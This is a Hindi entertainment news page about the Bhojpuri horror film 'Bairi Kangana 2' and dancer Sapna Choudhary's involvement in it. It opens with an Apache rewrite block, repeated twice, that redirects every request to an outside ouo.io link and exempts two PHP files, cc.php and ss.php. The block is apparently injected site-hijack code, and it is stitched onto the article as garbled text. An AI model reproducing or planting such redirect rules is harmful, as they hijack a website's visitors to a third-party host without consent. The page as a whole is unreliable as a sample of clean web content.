
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 343
नई दिल्ली। भोजपुरी सिनेमा में इन दिनों 'बैरी कंगना 2' को लेकर काफी चर्चा है। फिल्म में मेगा स्टार रवि किशन, काजल राघवानी और शुभी शर्मा लीड रोल में हैं और अब खबरों के मुताबिक फिल्म में हरियाणवी डांसर सपना चौधरी भी जुड़ रही हैं। सपना से जब इस बारे में बात की तो उन्होंने कहा, 'मुझे फिल्म की कहानी पूरी मालूम नहीं, मगर जिस लेवल पर इसका निर्माण हो रहा है उसके आधार पर मैं कह सकती हूं कि फिल्म काफी अच्छी होगी।'
सपना ने आगे कहा, 'मुझे भोजपुरी आती नहीं, मगर मेरे चाहने वालो में भोजपुरी के लोग भी हैं इसलिए मैं इस फिल्म में काम कर रही हूं।' निर्देशक अशोक त्रिपाठी अत्री ने फिल्म को लेकर बताया कि ये फिल्म आत्मा से संबंधित तो जरूर है, लेकिन इसमें रोमांस और मनोरंजन भी देखने को मिलेगा। रवि किशन का मानना है कि लंबे अर्से के बाद वो भोजपुरी में ऐसी फिल्म कर रहे हैं, जो उनके दिल के करीब है। वहीं फिल्म की लीड एक्ट्रेस काजल राघवानी ने कहा कि वो पहली बार हॉरर फिल्म कर रही हैं। उन्होंने कहा, 'इसमें मजा आ रहा है और बहुत कुछ सीखने को मिल रहा है।'
दरअसल, कुछ दिनों पहले सपना का एक नया सॉन्ग रिलीज हुआ था और रिलीज होते ही ये गाना तेजी से वायरल हो गया था। इस गाने का नाम है 'मेरा चांद'। इसे राज मावार ने गाया है। वीडियो में सपना, दुल्हन के आउटफिट में नजर आ रही हैं और अपने दूल्हे के घर गृहप्रवेश करती हैं। सपना के साथ इसमें नवीन नारू नजर आ रहे हैं। इस गाने में सपना का डांस स्टाइल तो नहीं दिखा, लेकिन उनका शर्मीला अंदाज जरूर दिखा।